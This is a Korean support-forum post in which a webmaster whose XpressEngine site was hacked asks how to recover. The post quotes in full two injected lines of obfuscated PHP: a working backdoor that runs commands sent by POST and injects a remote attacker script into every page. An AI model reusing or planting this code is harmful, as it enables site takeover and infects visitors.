묻고답하기

  2. Support
  3. 묻고답하기

base64_decode

2009.11.18 18:59

닉.네.임

현재 홈피가 마비되었습니다.

호스팅에 알아보니 해킹이 어쩌구.....개인정보가 누출....

화일 찾아보니

 

/html/config/config.inc.php에

 

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnYWFyJykpe2Z1bmN0aW9uIGFhcigkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyMWxjMmQxY25WcmRXeGhMbU52YlM5NVlXaHZiMTl6YVhSbFgyRmtiV2x1TDJsdVpHVjRMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gYWFyMigkYSwkYiwkYywkZCl7Z2xvYmFsJGFhcjE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGFhcjEpKWNhbGxfdXNlcl9mdW5jKCRhYXIxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdhYXInKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdhYXInKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kYWFybD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignYWFyMicpKSE9J2FhcjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?><?php

 

이렇게 되어 있고

 

/html/files/config/db.config.php에

 

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnampkJykpe2Z1bmN0aW9uIGpqZCgkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyMWxjMmQxY25WcmRXeGhMbU52YlM5NVlXaHZiMTl6YVhSbFgyRmtiV2x1TDJsdVpHVjRMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gampkMigkYSwkYiwkYywkZCl7Z2xvYmFsJGpqZDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGpqZDEpKWNhbGxfdXNlcl9mdW5jKCRqamQxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdqamQnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdqamQnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kampkbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignampkMicpKSE9J2pqZDInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?><?php if(!defined("__ZBXE__")) exit();

 

이런게 있습니다.

 

호스팅업체에서는 전문가를 동원해서 화일 하나하나 검색해 위와 같이 삽입된 악성코드를 삭제해야 한다고 합니다.

저에 개인신상 정보가 노출되 발생된 일이라고요.

 

그래서 /html/files/config/db.config.php의 악성코드 삭제 files외 전체 삭제후 1.2.4를 다운받아 설치했으나 멍통

이럴때에는 어찌해야 하나요?

방법 좀 알려 주시면 감사하겠습니다.

 

 

 

이 게시물을
좋아요
목록
글쓴이 제목 최종 글
XE 공지 글 쓰기,삭제 운영방식 변경 공지 [16] 2019.03.05 by 남기남
니아 제로보드4와 XE를 한 계정에서 동시에 설치해서 사용할 수 있나요? [3] 2009.11.18 by 수피아소년
번개손 업그레이드 후 관리자모드 오류 [1] file 2009.11.18 by 백성찬
십이신왕 optimized 폴더안에 있는 폴더 파일은 삭제해도 되나요 ? [1] 2009.11.18 by 백성찬
키르히아이스 XE 설치시 403 forbidden 에러 [1] 2009.11.18 by 백성찬
배먀 admin 페이지에서.. [1] 2009.11.18 by 백성찬
eunbini 상태표시줄에 주소 안뜨게 하는 방법부탁해요 [1] 2009.11.18 by lattente
박근수171 제로보드xe 게시판사용중 문제에 대해서 질문합니다.  
수영쟁이 분류 항상 펼침이 작동하지 않아요.ㅠ.ㅠ [1] 2009.11.18 by 정지양990
잠자는똥쟁이 제로보드에서 게시판 삭제오류에 관한.... [1] 2009.11.18 by lattente
김태균705 외부로그인 설정하는 방법 좀 알려주세요.  
미디맨 safe mode 설정에 관하여.. [3] 2009.11.18 by 백성찬
a? 댓글 작성이 안됩니다. [1] file 2009.11.18 by a?
심미현 메인도메인에 XE, 서브도메인엔 Textlye 사용시 생긴 궁금증! [1] 2009.11.18 by fenriz
가시밭 포인트 감소 [2] 2009.11.18 by 바람과비
옴니버스 host 주소 변경시 [1] 2009.11.18 by 샤이니라
kim in ha 요즘 파일다운 받을만한 곳 어디 없나요? [1] 2009.11.18 by kim in ha
三乭 백성찬의 동영상강좌 어디가서 볼 수 있나요? [1] 2009.11.18 by 백성찬
재비 회원 데이터베이스를 파일로 다운로드 받을 수 없을까요?  
실루에토 홈페이지 주소 변경후 페이지 오류 [1] 2009.11.18 by DuRi
장민혁503 갑자기 게시판이 보이질 않습니다  
LEE명우 제로보드XE 게시판에서 오류가납니다 [1] file 2009.11.18 by 백성찬
taenie 홈페이지 접속 오류 [1] 2009.11.18 by 백성찬
개발. 일정시간 사용안하면 자동로그안웃되게 할 수 없나요. [1] 2009.11.18 by 백성찬
넘버백 리퍼러 관리에서 클릭했을때 새로운창으로 열리게 할수 있나요?  
elma 게시판에서 첨부된 이미지가 출력되지 않습니다. [1] 2009.11.18 by 백성찬
뮤카 회원가입 창이 뜨질 않습니다. [1] file 2009.11.18 by 백성찬
보가니 파일첨부가 안되고 사라집니다. [1] 2009.11.18 by 휘즈
마이콘 script를 메인에 삽입하는 방법좀 자세히 알려주세요 [2] 2009.11.18 by 마이콘
엔시아- 쉬운 설치가 작동하지 않습니다. [1] file 2009.11.18 by 우리아기
닉.네.임 base64_decode [1] 2009.11.18
태그 쓰기